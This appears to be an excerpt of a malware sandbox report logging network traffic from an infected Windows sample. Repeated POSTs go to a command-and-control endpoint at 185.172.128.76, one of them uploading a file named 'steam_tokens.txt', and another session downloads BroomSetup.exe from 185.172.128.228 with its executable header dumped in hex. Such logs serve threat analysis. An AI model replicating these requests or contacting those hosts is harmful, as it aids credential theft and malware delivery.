Apr 23, 2024 09:43:36.197706938 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:36.251365900 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:36.582390070 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:36.587456942 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:36.917920113 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:36 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:36.923038006 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:37.257703066 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:37.262552977 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:37.588977098 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:37.594990015 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGII Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:37.925054073 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:37.931802034 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:38.261683941 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:38.318516016 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:38.653553963 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:38.658626080 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:38.987281084 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:38.997263908 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:39.324538946 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:39.329849958 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:39.659713030 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:39.664989948 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:39.994786024 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:40.000144005 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBGCAAAAFBKEBFHJEGCF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:40.331213951 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:40.356164932 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:40.685098886 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:40.719579935 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:41.049690962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:41.403948069 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:41.731743097 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:43.287869930 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHD Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:43.617410898 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:43.626724958 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:43.956629992 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:43.964041948 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:44.291290045 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:44.303559065 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDGHJEHJJDAAAKEBGCF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:44.635534048 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:44.641204119 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:44.972420931 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:44.987664938 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:45.320225954 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:45.340244055 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:45.673554897 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:45.682318926 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:46.013861895 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:46.019361973 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKECFIIEHCFHIECAFBAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:46.347203016 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:46.352756977 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:46.686954975 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:46.695343018 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJDHDAECBGCAKEBAEBA Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:47.030160904 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:47.036689043 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHJKKFBAEGDGDGCBKEC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:47.370089054 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:47.396636963 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJJDGHJKKJEBFHJDBGH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:47.723678112 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:47.747114897 CEST	564	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK Host: 185.172.128.76 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="file"------IEBFHCAKFBGDHIDHIDBK--
Apr 23, 2024 09:43:48.077455044 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:48.184870005 CEST	204	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJEGDAKEHJECAKEGDHJ Host: 185.172.128.76 Content-Length: 148851 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:43:48.876805067 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:43:48.913013935 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 31 38 31 38 31 36 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 2d 2d 0d 0a Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="message"1818166------EHJKJDGCGDAKFHIDBGCB--
Apr 23, 2024 09:43:49.242937088 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:43:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49704	185.172.128.228	80	5496	C:\Users\user\Desktop\zLwT7vCojz.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:16.650580883 CEST	185	OUT	GET /BroomSetup.exe HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:43:16.851650000 CEST	1289	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 07:43:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT ETag: "4a4030-613b1bf118700" Accept-Ranges: bytes Content-Length: 4866096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08\|7@B.rsrc<<@@JJ@@@Boole
Apr 23, 2024 09:43:16.851778030 CEST	1289	IN	Data Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
Apr 23, 2024 09:43:16.851784945 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 23, 2024 09:43:16.851797104 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 23, 2024 09:43:16.851804018 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 23, 2024 09:43:16.851810932 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 23, 2024 09:43:16.851823092 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
